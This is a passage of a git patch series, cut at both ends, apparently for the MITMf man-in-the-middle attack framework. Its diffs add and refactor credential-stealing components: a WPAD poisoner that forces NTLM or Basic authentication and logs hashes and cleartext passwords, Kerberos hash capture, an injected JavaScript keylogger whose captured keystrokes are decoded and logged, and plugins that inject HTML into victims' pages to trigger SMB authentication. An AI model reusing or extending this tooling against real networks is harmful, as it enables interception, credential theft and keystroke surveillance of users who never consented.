is: {}'.format(KerbHash)) + except Exception: + raise + def ParseMSKerbv5TCP(Data): MsgType = Data[21:22] EncType = Data[43:44] @@ -131,33 +155,3 @@ def ParseMSKerbv5UDP(Data): return BuildHash else: return False - -class KerbTCP(BaseRequestHandler): - - def handle(self): - try: - data = self.request.recv(1024) - KerbHash = ParseMSKerbv5TCP(data) - if KerbHash: - Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt" - WriteData(Outfile,KerbHash, KerbHash) - responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) - except Exception: - raise - -class KerbUDP(BaseRequestHandler): - - def handle(self): - try: - data, soc = self.request - KerbHash = ParseMSKerbv5UDP(data) - if KerbHash: - Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt" - WriteData(Outfile,KerbHash, KerbHash) - responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) - except Exception: - raise - -################################################################################## -#Kerberos Server stuff ends here -################################################################################## \ No newline at end of file diff --git a/core/protocols/kerberos/__init__.py b/core/responder/kerberos/__init__.py similarity index 100% rename from core/protocols/kerberos/__init__.py rename to core/responder/kerberos/__init__.py diff --git a/core/responder/nbtns/NBTNSPoisoner.py b/core/responder/nbtns/NBTNSPoisoner.py index f67160f..4563c52 100644 --- a/core/responder/nbtns/NBTNSPoisoner.py +++ b/core/responder/nbtns/NBTNSPoisoner.py @@ -4,6 +4,7 @@ import threading import socket import struct import logging +import string from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler from core.configwatcher import ConfigWatcher @@ -105,7 +106,8 @@ def Decode_Name(nbname): l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf))) return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', '')) - except: + except Exception, e: + mitmf_logger.debug("[NBTNSPoisoner] Error parsing NetBIOS name: {}".format(e)) return "Illegal NetBIOS name" # NBT_NS Server class. diff --git a/core/responder/wpad/WPADPoisoner.py b/core/responder/wpad/WPADPoisoner.py index a1bd1ef..7aa23f6 100644 --- a/core/responder/wpad/WPADPoisoner.py +++ b/core/responder/wpad/WPADPoisoner.py @@ -2,15 +2,17 @@ import socket import threading import logging -from HTTPPackets import * from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from core.configwatcher import ConfigWatcher +from HTTPPackets import * mitmf_logger = logging.getLogger("mitmf") class WPADPoisoner(): - def start(on_off): + def start(self): try: + mitmf_logger.debug("[WPADPoisoner] online") server = ThreadingTCPServer(("0.0.0.0", 80), HTTP) t = threading.Thread(name="HTTP", target=server.serve_forever) t.setDaemon(True) @@ -25,6 +27,27 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer): def server_bind(self): TCPServer.server_bind(self) +#HTTP Server Class +class HTTP(BaseRequestHandler): + + def handle(self): + try: + while True: + self.request.settimeout(1) + data = self.request.recv(8092) + buff = WpadCustom(data,self.client_address[0]) + if buff and WpadForcedAuth(Force_WPAD_Auth) == False: + Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) + if Verbose: + print Message + mitmf_logger.info(Message) + self.request.send(buff) + else: + buffer0 = PacketSequence(data,self.client_address[0]) + self.request.send(buffer0) + except Exception: + pass#No need to be verbose.. + #Parse NTLMv1/v2 hash. def ParseHTTPHash(data,client): LMhashLen = struct.unpack(' Date: Mon, 4 May 2015 23:13:21 +0200 Subject: [PATCH 08/20] WPAD Poisoner back online, removed options in config file and rellative code for choosing which DNS server to use. (there really was not point in keeping it) the --basic and --force options and the EXE serving in the Responder plugin have been removed, until I can find a better way of implementing them. Modified and re-added the JS-keylogger and SMBauth plugins --- config/mitmf.conf | 19 +--- core/configwatcher.py | 3 +- core/protocols/smb/SMBserver.py | 51 ++++++++- core/responder/wpad/WPADPoisoner.py | 119 +++----------------- core/sergioproxy/ProxyPlugins.py | 3 + core/sslstrip/ClientRequest.py | 21 ++-- core/sslstrip/ServerConnection.py | 7 +- core/sslstrip/URLMonitor.py | 4 - mitmf.py | 12 +- plugins/Inject.py | 8 +- plugins/JsKeylogger.py | 167 ++++++++++++++++++++++++++++ plugins/Responder.py | 21 ++-- plugins/SMBAuth.py | 42 +++++++ 13 files changed, 312 insertions(+), 165 deletions(-) create mode 100644 plugins/JsKeylogger.py create mode 100644 plugins/SMBAuth.py diff --git a/config/mitmf.conf b/config/mitmf.conf index 614ac72..04bd575 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -28,7 +28,6 @@ #Here you can configure MITMf's internal DNS server # - resolver = dnschef #Can be set to 'twisted' or 'dnschef' ('dnschef' is highly reccomended) tcp = Off #Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!) port = 53 #Port to listen on ipv6 = Off #Run in IPv6 mode (not fully tested, might break stuff!) @@ -119,22 +118,8 @@ #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS DontRespondToName = - [[HTTP Server]] - - #Set this to On if you want to always serve a specific file to the victim. - Serve-Always = Off - - #Set this to On if you want to serve an executable file each time a .exe is detected in an URL. - Serve-Exe = Off - - #Uncomment and specify a custom file to serve, the file must exist. - Filename = config/responder/Denied.html - - #Specify a custom executable file to serve, the file must exist. - ExecFilename = config/responder/FixInternet.exe - - #Set your custom PAC script - WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}' + #Set your custom PAC script + WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}' [[HTTPS Server]] diff --git a/core/configwatcher.py b/core/configwatcher.py index e6eaaaf..c583ff4 100644 --- a/core/configwatcher.py +++ b/core/configwatcher.py @@ -44,5 +44,6 @@ class ConfigWatcher(FileSystemEventHandler): def reloadConfig(self): try: self.config = ConfigObj("./config/mitmf.conf") - except Exception, e: + except Exception as e: mitmf_logger.warning("Error reloading config file: {}".format(e)) + pass diff --git a/core/protocols/smb/SMBserver.py b/core/protocols/smb/SMBserver.py index 7922382..57c5cb3 100644 --- a/core/protocols/smb/SMBserver.py +++ b/core/protocols/smb/SMBserver.py @@ -1,12 +1,12 @@ import logging -import threading import sys +import threading from impacket import smbserver, LOG LOG.setLevel(logging.INFO) LOG.propagate = False -#logging.getLogger('smbserver').setLevel(logging.INFO) -#logging.getLogger('impacket').setLevel(logging.INFO) +logging.getLogger('smbserver').setLevel(logging.INFO) +logging.getLogger('impacket').setLevel(logging.INFO) formatter = logging.Formatter("%(asctime)s [SMBserver] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") fileHandler = logging.FileHandler("./logs/mitmf.log") @@ -25,4 +25,47 @@ class SMBserver: def start(self): t = threading.Thread(name='SMBserver', target=self.server.start) t.setDaemon(True) - t.start() \ No newline at end of file + t.start() + +""" +class SMBserver(Thread): + def __init__(self): + Thread.__init__(self) + + def run(self): + # Here we write a mini config for the server + smbConfig = ConfigParser.ConfigParser() + smbConfig.add_section('global') + smbConfig.set('global','server_name','server_name') + smbConfig.set('global','server_os','UNIX') + smbConfig.set('global','server_domain','WORKGROUP') + smbConfig.set('global','log_file', 'None') + smbConfig.set('global','credentials_file','') + + # Let's add a dummy share + #smbConfig.add_section(DUMMY_SHARE) + #smbConfig.set(DUMMY_SHARE,'comment','') + #smbConfig.set(DUMMY_SHARE,'read only','no') + #smbConfig.set(DUMMY_SHARE,'share type','0') + #smbConfig.set(DUMMY_SHARE,'path',SMBSERVER_DIR) + + # IPC always needed + smbConfig.add_section('IPC$') + smbConfig.set('IPC$','comment','') + smbConfig.set('IPC$','read only','yes') + smbConfig.set('IPC$','share type','3') + smbConfig.set('IPC$','path') + + self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig) + + self.smb.processConfigFile() + try: + self.smb.serve_forever() + except: + pass + + def stop(self): + self.smb.socket.close() + self.smb.server_close() + self._Thread__stop() +""" \ No newline at end of file diff --git a/core/responder/wpad/WPADPoisoner.py b/core/responder/wpad/WPADPoisoner.py index 7aa23f6..c978338 100644 --- a/core/responder/wpad/WPADPoisoner.py +++ b/core/responder/wpad/WPADPoisoner.py @@ -1,16 +1,23 @@ import socket import threading import logging +import re from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler from core.configwatcher import ConfigWatcher +from core.responder.common import * from HTTPPackets import * mitmf_logger = logging.getLogger("mitmf") class WPADPoisoner(): - def start(self): + def start(self, options): + + global args; args = options + args.forceWpadAuth = False + args.basic = False + try: mitmf_logger.debug("[WPADPoisoner] online") server = ThreadingTCPServer(("0.0.0.0", 80), HTTP) @@ -36,17 +43,14 @@ class HTTP(BaseRequestHandler): self.request.settimeout(1) data = self.request.recv(8092) buff = WpadCustom(data,self.client_address[0]) - if buff and WpadForcedAuth(Force_WPAD_Auth) == False: - Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) - if Verbose: - print Message - mitmf_logger.info(Message) + if buff and args.forceWpadAuth is False: + mitmf_logger.info("[WPADPoisoner] WPAD (no auth) file sent to: {}".format(self.client_address[0])) self.request.send(buff) else: buffer0 = PacketSequence(data,self.client_address[0]) self.request.send(buffer0) - except Exception: - pass#No need to be verbose.. + except Exception as e: + pass #Parse NTLMv1/v2 hash. def ParseHTTPHash(data,client): @@ -92,18 +96,8 @@ def ParseHTTPHash(data,client): mitmf_logger.info('[+]HTTP NTLMv2 Hostname is :%s'%(HostName)) mitmf_logger.info('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash)) -def GrabCookie(data,host): - Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data) - if Cookie: - CookieStr = "[+]HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0)) - mitmf_logger.info(CookieStr) - return Cookie.group(0) - else: - NoCookies = "No cookies were sent with this request" - mitmf_logger.info(NoCookies) - return NoCookies - def WpadCustom(data,client): + WPAD_Script = ConfigWatcher.getInstance().getConfig()["Responder"]['WPADScript'] Wpad = re.search('(/wpad.dat|/*\.pac)', data) if Wpad: buffer1 = WPADScript(Payload=WPAD_Script) @@ -112,12 +106,6 @@ def WpadCustom(data,client): else: return False -def WpadForcedAuth(Force_WPAD_Auth): - if Force_WPAD_Auth == True: - return True - if Force_WPAD_Auth == False: - return False - # Function used to check if we answer with a Basic or NTLM auth. def Basic_Ntlm(Basic): if Basic == True: @@ -125,77 +113,14 @@ def Basic_Ntlm(Basic): else: return IIS_Auth_401_Ans() -def ServeEXE(data,client, Filename): - Message = "[+]Sent %s file sent to: %s."%(Filename,client) - mitmf_logger.info(Message) - with open (Filename, "rb") as bk: - data = bk.read() - bk.close() - return data - -def ServeEXEOrNot(on_off): - if Exe_On_Off == "ON": - return True - if Exe_On_Off == "OFF": - return False - -def ServeEXECAlwaysOrNot(on_off): - if Exec_Mode_On_Off == "ON": - return True - if Exec_Mode_On_Off == "OFF": - return False - -def IsExecutable(Filename): - exe = re.findall('.exe',Filename) - if exe: - return True - else: - return False - -def GrabURL(data, host): - GET = re.findall('(?<=GET )[^HTTP]*', data) - POST = re.findall('(?<=POST )[^HTTP]*', data) - POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data) - if GET: - HostStr = "[+]HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET)) - mitmf_logger.info(HostStr) - #print HostStr - - if POST: - Host3Str = "[+]HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST)) - mitmf_logger.info(Host3Str) - #print Host3Str - if len(''.join(POSTDATA)) >2: - PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) - #print PostData - mitmf_logger.info(PostData) - #Handle HTTP packet sequence. def PacketSequence(data,client): Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data) BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data) - if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data): - File = config.get('HTTP Server', 'ExecFilename') - buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File) - buffer1.calculate() - return str(buffer1) - - if ServeEXECAlwaysOrNot(Exec_Mode_On_Off): - if IsExecutable(FILENAME): - buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME) - buffer1.calculate() - return str(buffer1) - else: - buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME)) - buffer1.calculate() - return str(buffer1) - if Ntlm: packetNtlm = b64decode(''.join(Ntlm))[8:9] if packetNtlm == "\x01": - GrabURL(data,client) - GrabCookie(data,client) r = NTLM_Challenge(ServerChallenge=Challenge) r.calculate() t = IIS_NTLM_Challenge_Ans() @@ -205,11 +130,8 @@ def PacketSequence(data,client): if packetNtlm == "\x03": NTLM_Auth= b64decode(''.join(Ntlm)) ParseHTTPHash(NTLM_Auth,client) - if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "[+]WPAD (auth) file sent to: %s"%(client) - if Verbose: - print Message - mitmf_logger.info(Message) + if args.forceWpadAuth and WpadCustom(data,client): + mitmf_logger.info("[WPADPoisoner] WPAD (auth) file sent to: {}".format(client)) buffer1 = WpadCustom(data,client) return buffer1 else: @@ -218,16 +140,11 @@ def PacketSequence(data,client): return str(buffer1) if BasicAuth: - GrabCookie(data,client) - GrabURL(data,client) outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt" WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) mitmf_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) - if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "[+]WPAD (auth) file sent to: %s"%(client) - if Verbose: - print Message - mitmf_logger.info(Message) + if args.forceWpadAuth and WpadCustom(data,client): + mitmf_logger.info("[WPADPoisoner] WPAD (auth) file sent to: {}".format(client)) buffer1 = WpadCustom(data,client) return buffer1 else: @@ -236,5 +153,5 @@ def PacketSequence(data,client): return str(buffer1) else: - return str(Basic_Ntlm(Basic)) + return str(Basic_Ntlm(args.basic)) \ No newline at end of file diff --git a/core/sergioproxy/ProxyPlugins.py b/core/sergioproxy/ProxyPlugins.py index dea21f4..c58cc8d 100644 --- a/core/sergioproxy/ProxyPlugins.py +++ b/core/sergioproxy/ProxyPlugins.py @@ -17,8 +17,11 @@ # import sys +import logging import inspect +mitmf_logger = logging.getLogger("mitmf") + class ProxyPlugins: ''' This class does some magic so that all we need to do in diff --git a/core/sslstrip/ClientRequest.py b/core/sslstrip/ClientRequest.py index 721438b..df60e20 100644 --- a/core/sslstrip/ClientRequest.py +++ b/core/sslstrip/ClientRequest.py @@ -192,21 +192,14 @@ class ClientRequest(Request): else: mitmf_logger.debug("[ClientRequest] Host not cached.") - - if self.urlMonitor.getResolver() == 'dnschef': + self.customResolver.port = self.urlMonitor.getResolverPort() - self.customResolver.port = self.urlMonitor.getResolverPort() - - try: - mitmf_logger.debug("[ClientRequest] Resolving with DNSChef") - address = str(self.customResolver.query(host)[0].address) - return defer.succeed(address) - except Exception: - mitmf_logger.debug("[ClientRequest] Exception occured, falling back to Twisted") - return reactor.resolve(host) - - elif self.urlMonitor.getResolver() == 'twisted': - mitmf_logger.debug("[ClientRequest] Resolving with Twisted") + try: + mitmf_logger.debug("[ClientRequest] Resolving with DNSChef") + address = str(self.customResolver.query(host)[0].address) + return defer.succeed(address) + except Exception: + mitmf_logger.debug("[ClientRequest] Exception occured, falling back to Twisted") return reactor.resolve(host) def process(self): diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 0a64cea..3c53eb6 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -71,7 +71,8 @@ class ServerConnection(HTTPClient): try: user_agent = parse(self.headers['user-agent']) self.clientInfo = "{} [type:{}-{} os:{}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family) - except: + except Exception as e: + mitmf_logger.debug("[ServerConnection] Failed to parse client UA: {}".format(e)) self.clientInfo = "{} ".format(self.client.getClientIP()) mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host'])) @@ -135,7 +136,7 @@ class ServerConnection(HTTPClient): self.isCompressed = True elif (key.lower()== 'strict-transport-security'): - mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.client.getClientIP())) + mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.clientInfo)) elif (key.lower() == 'content-length'): self.contentLength = value @@ -181,7 +182,7 @@ class ServerConnection(HTTPClient): mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data))) data = self.replaceSecureLinks(data) - res = self.plugins.hook() + res = self.plugins.hook() data = res['data'] if (self.contentLength != None): diff --git a/core/sslstrip/URLMonitor.py b/core/sslstrip/URLMonitor.py index 9ef7b78..f306db7 100644 --- a/core/sslstrip/URLMonitor.py +++ b/core/sslstrip/URLMonitor.py @@ -53,10 +53,6 @@ class URLMonitor: return URLMonitor._instance - #This is here because I'm lazy - def getResolver(self): - return ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['resolver'].lower() - #This is here because I'm lazy def getResolverPort(self): return int(ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['port']) diff --git a/mitmf.py b/mitmf.py index d4dd7d4..349b76b 100755 --- a/mitmf.py +++ b/mitmf.py @@ -23,7 +23,6 @@ import sys import os import logging import threading -import user_agents from twisted.web import http from twisted.internet import reactor @@ -69,7 +68,7 @@ plugins = [] try: for p in plugin_classes: plugins.append(p()) -except Exception, e: +except Exception as e: print "[-] Failed to load plugin class {}: {}".format(p, e) #Give subgroup to each plugin with options @@ -148,7 +147,7 @@ strippingFactory.protocol = StrippingProxy reactor.listenTCP(args.listen, strippingFactory) for p in load: - + p.pluginReactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it p.startConfigWatch() @@ -165,12 +164,15 @@ from core.netcreds.NetCreds import NetCreds NetCreds().start(args.interface, myip) print "|_ Net-Creds v{} online".format(netcreds_version) -#Start all servers! +#Start DNSChef from core.dnschef.DNSchef import DNSChef DNSChef.getInstance().start() -print "|_ DNSChef v{} online\n".format(dnschef_version) +print "|_ DNSChef v{} online".format(dnschef_version) +#start the SMB server from core.protocols.smb.SMBserver import SMBserver +from impacket import version +print "|_ SMBserver online (Impacket {})\n".format(version.VER_MINOR) SMBserver().start() #start the reactor diff --git a/plugins/Inject.py b/plugins/Inject.py index a28375b..ccad52d 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -87,14 +87,13 @@ class Inject(CacheKill, Plugin): self.dtable[ip+hn] = True self.count += 1 mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn)) - return {'request': request, 'data': data} - else: - return + + return {'request': request, 'data': data} def _get_payload(self): return self._get_js() + self._get_iframe() + self.html_payload - def add_options(self,options): + def add_options(self, options): options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.") options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.") options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.") @@ -136,7 +135,6 @@ class Inject(CacheKill, Plugin): if self.per_domain: return not ip+hn in self.dtable - #print mime return mime.find(self.mime) != -1 def _get_req_info(self, request): diff --git a/plugins/JsKeylogger.py b/plugins/JsKeylogger.py new file mode 100644 index 0000000..c84655b --- /dev/null +++ b/plugins/JsKeylogger.py @@ -0,0 +1,167 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +from plugins.plugin import Plugin +from plugins.Inject import Inject +import logging + +class jskeylogger(Inject, Plugin): + name = "Javascript Keylogger" + optname = "jskeylogger" + desc = "Injects a javascript keylogger into clients webpages" + implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] + depends = ["Inject"] + version = "0.2" + has_opts = False + + def initialize(self, options): + Inject.initialize(self, options) + self.html_payload = self.msf_keylogger() + + def sendPostData(self, request): + #Handle the plugin output + if 'keylog' in request.uri: + + raw_keys = request.postData.split("&&")[0] + keys = raw_keys.split(",") + del keys[0]; del(keys[len(keys)-1]) + + input_field = request.postData.split("&&")[1] + + nice = '' + for n in keys: + if n == '9': + nice += "" + elif n == '8': + nice = nice.replace(nice[-1:], "") + elif n == '13': + nice = '' + else: + try: + nice += n.decode('hex') + except: + mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n)) + + #try: + # input_field = input_field.decode('hex') + #except: + # mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field)) + + mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice)) + + def msf_keylogger(self): + #Stolen from the Metasploit module http_javascript_keylogger + + payload = """""" + + return payload \ No newline at end of file diff --git a/plugins/Responder.py b/plugins/Responder.py index fc5eab8..bea6141 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -18,13 +18,12 @@ # USA # -import sys -import os import threading from plugins.plugin import Plugin from twisted.internet import reactor from core.utils import SystemConfig + from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner from core.responder.wpad.WPADPoisoner import WPADPoisoner from core.responder.mdns.MDNSPoisoner import MDNSPoisoner @@ -57,9 +56,9 @@ class Responder(Plugin): KERBServer().start() NBTNSPoisoner().start(options, self.ourip) LLMNRPoisoner().start(options, self.ourip) - + if options.wpad: - WPADPoisoner().start() + WPADPoisoner().start(options) if options.analyze: self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") @@ -69,10 +68,10 @@ class Responder(Plugin): def add_options(self, options): options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning") - options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") - options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query") - options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False") - options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") - options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False") + options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Enables answers for netbios wredir suffix queries") + options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Enables answers for netbios domain suffix queries") + options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "Fingerprint hosts that issued an NBT-NS or LLMNR query") + options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier") + options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Start the WPAD rogue proxy server") + #options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") + #options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") diff --git a/plugins/SMBAuth.py b/plugins/SMBAuth.py new file mode 100644 index 0000000..9a25de4 --- /dev/null +++ b/plugins/SMBAuth.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +from core.utils import SystemConfig +from plugins.plugin import Plugin +from plugins.Inject import Inject + +class SMBAuth(Inject, Plugin): + name = "SMBAuth" + optname = "smbauth" + desc = "Evoke SMB challenge-response auth attempts" + depends = ["Inject"] + version = "0.1" + has_opts = False + + def initialize(self, options): + Inject.initialize(self, options) + self.target_ip = SystemConfig.getIP(options.interface) + + self.html_payload = self._get_data() + + def _get_data(self): + return ''\ + ''\ + '' % tuple([self.target_ip]*3) From dfa9c9d65edb1d4bc3cb0687632b55225e6da1b6 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 5 May 2015 00:39:59 +0200 Subject: [PATCH 09/20] Added debug logging to ProxyPlugins, it will now print a traceback if errors occur in hooked functions --- core/sergioproxy/ProxyPlugins.py | 11 ++++++++++- core/sslstrip/ServerConnection.py | 2 +- plugins/Inject.py | 2 ++ plugins/Upsidedownternet.py | 1 + 4 files changed, 14 insertions(+), 2 deletions(-) diff --git a/core/sergioproxy/ProxyPlugins.py b/core/sergioproxy/ProxyPlugins.py index c58cc8d..a182326 100644 --- a/core/sergioproxy/ProxyPlugins.py +++ b/core/sergioproxy/ProxyPlugins.py @@ -19,6 +19,7 @@ import sys import logging import inspect +import traceback mitmf_logger = logging.getLogger("mitmf") @@ -59,9 +60,12 @@ class ProxyPlugins: for p in plugins: self.addPlugin(p) + mitmf_logger.debug("[ProxyPlugins] Loaded {} plugin/s".format(len(self.plist))) + def addPlugin(self,p): '''Load a plugin''' self.plist.append(p) + mitmf_logger.debug("[ProxyPlugins] Adding {} plugin".format(p.name)) for mthd in p.implements: try: self.pmthds[mthd].append(getattr(p,mthd)) @@ -71,6 +75,7 @@ class ProxyPlugins: def removePlugin(self,p): '''Unload a plugin''' self.plist.remove(p) + mitmf_logger.debug("[ProxyPlugins] Removing {} plugin".format(p.name)) for mthd in p.implements: self.pmthds[mthd].remove(p) @@ -95,8 +100,12 @@ class ProxyPlugins: for f in self.pmthds[fname]: a = f(**args) if a != None: args = a - except KeyError: + except KeyError as e: pass + except Exception as e: + #This is needed because errors in hooked functions won't raise an Exception + Tracback (which can be infuriating) + mitmf_logger.error("[ProxyPlugins] Exception occurred in hooked function") + traceback.print_exc() #pass our changes to the locals back down return args diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 3c53eb6..3aadfc5 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -189,7 +189,7 @@ class ServerConnection(HTTPClient): self.client.setHeader('Content-Length', len(data)) try: - self.client.write(data) #Gets rid of some generic errors + self.client.write(data) except: pass diff --git a/plugins/Inject.py b/plugins/Inject.py index ccad52d..2b75e37 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -28,6 +28,8 @@ from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.CacheKill import CacheKill +mitmf_logger = logging.getLogger("mitmf") + class Inject(CacheKill, Plugin): name = "Inject" optname = "inject" diff --git a/plugins/Upsidedownternet.py b/plugins/Upsidedownternet.py index 402c9e5..f14778e 100644 --- a/plugins/Upsidedownternet.py +++ b/plugins/Upsidedownternet.py @@ -66,4 +66,5 @@ class Upsidedownternet(Plugin): mitmf_logger.info("{} Flipped image".format(request.client.getClientIP())) except Exception as e: mitmf_logger.info("{} Error: {}".format(request.client.getClientIP(), e)) + return {'request': request, 'data': data} From 70ec5a2bbcb1269389123b58366bb702a2df2265 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 5 May 2015 19:04:01 +0200 Subject: [PATCH 10/20] All plugins are now modified to support dynamic config file changes Responder functionality fully restored --- config/mitmf.conf | 46 +- config/responder/Denied.html | 31 - config/responder/FixInternet.exe | Bin 25113 -> 0 bytes .../responder/certs/gen-self-signed-cert.sh | 2 - config/responder/certs/responder.crt | 19 - config/responder/certs/responder.key | 27 - core/configwatcher.py | 4 +- core/dnschef/DNSchef.py | 1 + core/netcreds/NetCreds.py | 2 + core/protocols/http/HTTPProxy.py | 240 ------- core/protocols/mssql/MSSQLServer.py | 128 ---- core/protocols/pop3/POP3Server.py | 69 -- core/protocols/smb/SMBserver.py | 8 +- core/protocols/smtp/SMTPServer.py | 63 